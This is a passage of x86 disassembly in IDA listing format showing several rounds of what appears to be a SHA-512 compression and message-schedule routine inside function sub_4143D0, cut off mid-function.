xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_130]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_124]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_128]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_130]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_120]
and edx, ecx
mov ecx, [esp+170h+var_124]
xor ebp, eax
and ebp, [esp+170h+var_11C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_138], edi
adc [esp+170h+var_134], esi
cmp [esp+170h+var_15C], 0
jz loc_414F30
mov eax, [esp+170h+var_D0]
mov ecx, [esp+170h+var_CC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_CC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_108]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_104]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_108]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_104]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C0]
adc edx, [esp+170h+var_BC]
add ecx, [esp+170h+var_A8]
adc edx, [esp+170h+var_A4]
mov [eax+70h], ecx
mov [eax+74h], edx
mov eax, edx
mov [esp+170h+var_A8], ecx
mov [esp+170h+var_A4], eax
mov [esp+170h+var_88], ecx
jmp short loc_414F45
; ---------------------------------------------------------------------------
loc_414F30: ; CODE XREF: sub_4143D0+A75�j
mov edx, [esp+170h+var_A8]
mov eax, [esp+170h+var_A4]
mov [esp+170h+var_88], edx
loc_414F45: ; CODE XREF: sub_4143D0+B5E�j
mov ecx, [esp+170h+var_154]
mov [esp+170h+var_84], eax
mov eax, [esp+170h+var_158]
mov ebx, ecx
xor esi, esi
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
mov edx, ecx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
xor ebx, ebx
or ebx, ebp
mov ebp, [esp+170h+var_154]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
shr ebp, 0Eh
or ecx, ebp
mov ebp, [esp+170h+var_150]
xor esi, ecx
mov ecx, [esp+170h+var_154]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_14C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_144]
xor edi, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F970[eax*8]
mov edi, [esp+170h+var_12C]
adc esi, ds:dword_41F974[eax*8]
add edx, [esp+170h+var_88]
mov eax, [esp+170h+var_140]
adc esi, [esp+170h+var_84]
add eax, edx
adc ecx, esi
add [esp+170h+var_120], eax
mov esi, [esp+170h+var_130]
mov [esp+170h+var_140], eax
adc [esp+170h+var_11C], ecx
mov [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_138]
mov eax, esi
xor eax, ecx
mov [esp+170h+var_98], eax
mov eax, [esp+170h+var_134]
mov edx, edi
xor edx, eax
mov [esp+170h+var_94], edx
mov edx, esi
and edx, ecx
mov [esp+170h+var_90], edx
mov edx, edi
and edx, eax
mov [esp+170h+var_8C], edx
mov edx, ecx
xor esi, esi
shl edx, 4
mov edi, ecx
mov ebx, eax
shrd edi, ebx, 1Ch
shr ebx, 1Ch
or edx, ebx
or esi, edi
mov ebp, eax
shld ebp, ecx, 1Eh
xor ebx, ebx
shl ecx, 1Eh
or ebx, ebp
mov edi, eax
xor edx, ebx
mov ebx, [esp+170h+var_138]
shr edi, 2
or edi, ecx
mov ecx, eax
shld eax, ebx, 19h
xor esi, edi
shr ecx, 7
xor edi, edi
or edi, eax
mov eax, [esp+170h+var_98]
and eax, [esp+170h+var_128]
shl ebx, 19h
xor eax, [esp+170h+var_90]
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_94]
and ecx, [esp+170h+var_124]
xor edx, edi
xor ecx, [esp+170h+var_8C]
add esi, eax
adc edx, ecx
add [esp+170h+var_140], esi
adc [esp+170h+var_13C], edx
cmp [esp+170h+var_15C], 0
jz loc_4151B2
mov eax, [esp+170h+var_B8]
mov ecx, [esp+170h+var_B4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_B4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_D8]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_D4]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_D8]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_D4]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D0]
adc edx, [esp+170h+var_CC]
add ecx, [esp+170h+var_A0]
adc edx, [esp+170h+var_9C]
mov [eax+78h], ecx
mov [eax+7Ch], edx
mov eax, edx
mov [esp+170h+var_D0], ecx
mov [esp+170h+var_CC], eax
mov [esp+170h+var_60], ecx
jmp short loc_4151C7
; ---------------------------------------------------------------------------
loc_4151B2: ; CODE XREF: sub_4143D0+CEB�j
mov edx, [esp+170h+var_D0]
mov eax, [esp+170h+var_CC]
mov [esp+170h+var_60], edx
loc_4151C7: ; CODE XREF: sub_4143D0+DE0�j
mov ecx, [esp+170h+var_11C]
mov ebx, ecx
mov [esp+170h+var_5C], eax
mov eax, [esp+170h+var_120]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_11C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
shr ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_158]
xor esi, ecx
mov ecx, [esp+170h+var_11C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_154]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_14C]
not edi
and edi, [esp+170h+var_150]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F978[eax*8]
adc esi, ds:dword_41F97C[eax*8]
add edx, [esp+170h+var_60]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_5C]
add ecx, edx
mov edx, [esp+170h+var_144]
adc edx, esi
add eax, ecx
adc [esp+170h+var_124], edx
mov [esp+170h+var_148], ecx
mov ecx, [esp+170h+var_140]
mov [esp+170h+var_144], edx
mov edx, [esp+170h+var_13C]
mov ebx, ecx
mov ebp, edx
shrd ebx, ebp, 1Ch
xor edi, edi
or edi, ebx
mov esi, ecx
mov ebx, edx
shld edx, ecx, 1Eh
shr ebp, 1Ch
shl esi, 4
or esi, ebp
shr ebx, 2
shl ecx, 1Eh
xor ebp, ebp
or ebx, ecx
mov [esp+170h+var_128], eax
or ebp, edx
mov ecx, [esp+170h+var_13C]
xor esi, ebp
mov ebp, [esp+170h+var_140]
mov edx, ecx
shld ecx, ebp, 19h
xor edi, ebx
shr edx, 7
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_98]
and ecx, [esp+170h+var_140]
shl ebp, 19h
xor ecx, [esp+170h+var_90]
or edx, ebp
xor edi, edx
mov edx, [esp+170h+var_94]
and edx, [esp+170h+var_13C]
xor esi, ebx
xor edx, [esp+170h+var_8C]
add edi, ecx
adc esi, edx
add [esp+170h+var_148], edi
adc [esp+170h+var_144], esi
cmp [esp+170h+var_15C], 0
jz loc_41540D
mov eax, [esp+170h+var_A8]
mov ecx, [esp+170h+var_A4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_A4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_118]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_114]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_118]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_114]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor edi, eax
mov eax, [esp+170h+arg_0]
xor esi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D8]
adc edx, [esp+170h+var_D4]
add ecx, [esp+170h+var_E0]
adc edx, [esp+170h+var_DC]
mov [eax+80h], ecx
mov [eax+84h], edx
mov eax, edx
mov [esp+170h+var_D4], eax
mov [esp+170h+var_14], eax
mov eax, [esp+170h+var_128]
mov [esp+170h+var_D8], ecx
mov [esp+170h+var_18], ecx
jmp short loc_415429
; ---------------------------------------------------------------------------
loc_41540D: ; CODE XREF: sub_4143D0+F41�j
mov edx, [esp+170h+var_D8]
mov ecx, [esp+170h+var_D4]
mov [esp+170h+var_18], edx
mov [esp+170h+var_14], ecx
loc_415429: ; CODE XREF: sub_4143D0+103B�j
mov ecx, [esp+170h+var_124]
mov ebx, ecx
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_124]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_120]
xor esi, ecx
mov ecx, [esp+170h+var_124]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_11C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_14C]
not ebx
and ebx, [esp+170h+var_154]
not edi
and edi, [esp+170h+var_158]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F980[eax*8]
adc esi, ds:dword_41F984[eax*8]
add edx, [esp+170h+var_18]
mov eax, [esp+170h+var_150]
adc esi, [esp+170h+var_14]
add eax, edx
adc ecx, esi
add [esp+170h+var_130], eax
mov [esp+170h+var_14C], ecx
mov [esp+170h+var_150], eax
adc [esp+170h+var_12C], ecx
mov eax, [esp+170h+var_144]
mov ecx, [esp+170h+var_148]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_148]
mov ebp, eax
shld ebp, ebx, 19h
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_13C]
xor ebp, [esp+170h+var_134]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_140]
xor edi, ecx
mov ecx, [esp+170h+var_138]
and ebp, eax
mov eax, [esp+170h+var_13C]
and eax, [esp+170h+var_134]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_150], edi
adc [esp+170h+var_14C], esi
cmp [esp+170h+var_15C], 0
jz loc_415651
mov eax, [esp+170h+var_C8]
mov ecx, [esp+170h+var_C4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_C4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_D0]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_CC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_D0]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_CC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_118]
adc edx, [esp+170h+var_114]
add ecx, [esp+170h+var_100]
adc edx, [esp+170h+var_FC]
mov [eax+88h], ecx
mov [eax+8Ch], edx
mov eax, edx
mov [esp+170h+var_118], ecx
mov [esp+170h+var_114], eax
mov [esp+170h+var_48], ecx
jmp short loc_415660
; ---------------------------------------------------------------------------
loc_415651: ; CODE XREF: sub_4143D0+1196�j
mov edx, [esp+170h+var_118]
mov eax, [esp+170h+var_114]
mov [esp+170h+var_48], edx
loc_415660: ; CODE XREF: sub_4143D0+127F�j
mov ecx, [esp+170h+var_12C]
mov ebx, ecx
mov [esp+170h+var_44], eax
mov eax, [esp+170h+var_130]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_12C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_128]
xor esi, ecx
mov ecx, [esp+170h+var_12C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_124]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_154]
not ebx
and ebx, [esp+170h+var_11C]
not edi
and edi, [esp+170h+var_120]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F988[eax*8]
adc esi, ds:dword_41F98C[eax*8]
add edx, [esp+170h+var_48]
mov eax, [esp+170h+var_158]
adc esi, [esp+170h+var_44]
add eax, edx
adc ecx, esi
add [esp+170h+var_138], eax
mov [esp+170h+var_154], ecx
mov [esp+170h+var_158], eax
adc [esp+170h+var_134], ecx
mov ecx, [esp+170h+var_150]
mov eax, [esp+170h+var_14C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_150]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edx, edx
or edx, ebp
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_140]
mov ebx, ecx
xor ebx, edx
and ebx, [esp+170h+var_148]
mov ebp, eax
xor ebp, [esp+170h+var_13C]
and eax, [esp+170h+var_13C]
and ebp, [esp+170h+var_144]
and ecx, edx
xor ebx, ecx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_158], edi
adc [esp+170h+var_154], esi
cmp [esp+170h+var_15C], 0
jz loc_41589B
mov eax, [esp+170h+var_D8]
mov ecx, [esp+170h+var_D4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_D4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_F0]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_EC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_F0]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_EC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C8]
adc edx, [esp+170h+var_C4]
add ecx, [esp+170h+var_110]
adc edx, [esp+170h+var_10C]
mov [eax+90h], ecx
mov [eax+94h], edx
mov eax, edx
mov [esp+170h+var_C8], ecx
mov [esp+170h+var_C4], eax
mov [esp+170h+var_80], ecx
jmp short loc_4158B0
; ---------------------------------------------------------------------------
loc_41589B: ; CODE XREF: sub_4143D0+13D4�j
mov edx, [esp+170h+var_C8]
mov eax, [esp+170h+var_C4]
mov [esp+170h+var_80], edx
loc_4158B0: ; CODE XREF: sub_4143D0+14C9�j
mov ecx, [esp+170h+var_134]
mov ebx, ecx
mov [esp+170h+var_7C], eax
mov eax, [esp+170h+var_138]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_134]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_130]
xor esi, ecx
mov ecx, [esp+170h+var_134]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_12C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_11C]
not ebx
and ebx, [esp+170h+var_124]
not edi
and edi, [esp+170h+var_128]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F990[eax*8]
adc esi, ds:dword_41F994[eax*8]
add edx, [esp+170h+var_80]
mov eax, [esp+170h+var_120]
adc esi, [esp+170h+var_7C]
add eax, edx
adc ecx, esi
add [esp+170h+var_140], eax
mov [esp+170h+var_11C], ecx
mov [esp+170h+var_120], eax
adc [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_158]
mov eax, [esp+170h+var_154]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_158]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_14C]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_150]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_158]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
mov ecx, [esp+170h+var_14C]
xor ebp, eax
and ebp, [esp+170h+var_144]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_120], edi
adc [esp+170h+var_11C], esi
cmp [esp+170h+var_15C], 0
jz loc_415AE1
mov eax, [esp+170h+var_E8]
mov ecx, [esp+170h+var_E4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_E4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_118]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_114]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_118]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_114]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_108]
adc edx, [esp+170h+var_104]
add ecx, [esp+170h+var_F0]
adc edx, [esp+170h+var_EC]
mov [eax+98h], ecx
mov [eax+9Ch], edx
mov eax, edx
mov [esp+170h+var_F0], ecx
mov [esp+170h+var_EC], eax
mov [esp+170h+var_78], ecx
jmp short loc_415AF6
; ---------------------------------------------------------------------------
loc_415AE1: ; CODE XREF: sub_4143D0+1626�j
mov edx, [esp+170h+var_F0]
mov eax, [esp+170h+var_EC]
mov [esp+170h+var_78], edx
loc_415AF6: ; CODE XREF: sub_4143D0+170F�j
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
mov [esp+170h+var_74], eax
mov eax, [esp+170h+var_140]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_13C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
and ecx, [esp+170h+var_134]
mov edi, eax
and eax, [esp+170h+var_138]
not ebx
and ebx, [esp+170h+var_12C]
not edi
and edi, [esp+170h+var_130]
xor ebx, ecx
mov ecx, [esp+170h+var_124]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F998[eax*8]
adc esi, ds:dword_41F99C[eax*8]
add edx, [esp+170h+var_78]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_74]
add eax, edx
adc ecx, esi
add [esp+170h+var_148], eax
mov [esp+170h+var_124], ecx
mov [esp+170h+var_128], eax
adc [esp+170h+var_144], ecx
mov eax, [esp+170h+var_11C]
mov ecx, [esp+170h+var_120]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_120]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_154]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_158]
xor edi, ecx
mov ecx, [esp+170h+var_120]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_150]
and edx, ecx
mov ecx, [esp+170h+var_154]
xor ebp, eax
and ebp, [esp+170h+var_14C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_128], edi
adc [esp+170h+var_124], esi
cmp [esp+170h+var_15C], 0
jz loc_415D29
mov eax, [esp+170h+var_C8]
mov ecx, [esp+170h+var_C4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_C4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_F8]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_F4]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_F8]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_F4]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_B8]
adc edx, [esp+170h+var_B4]
add ecx, [esp+170h+var_E8]
adc edx, [esp+170h+var_E4]
mov [eax+0A0h], ecx
mov [eax+0A4h], edx
mov eax, edx
mov [esp+170h+var_E8], ecx
mov [esp+170h+var_E4], eax
mov [esp+170h+var_68], ecx
jmp short loc_415D3E
; ---------------------------------------------------------------------------
loc_415D29: ; CODE XREF: sub_4143D0+1868�j
mov edx, [esp+170h+var_E8]
mov eax, [esp+170h+var_E4]
mov [esp+170h+var_68], edx
loc_415D3E: ; CODE XREF: sub_4143D0+1957�j
mov ecx, [esp+170h+var_144]
mov ebx, ecx
mov [esp+170h+var_64], eax
mov eax, [esp+170h+var_148]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_144]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
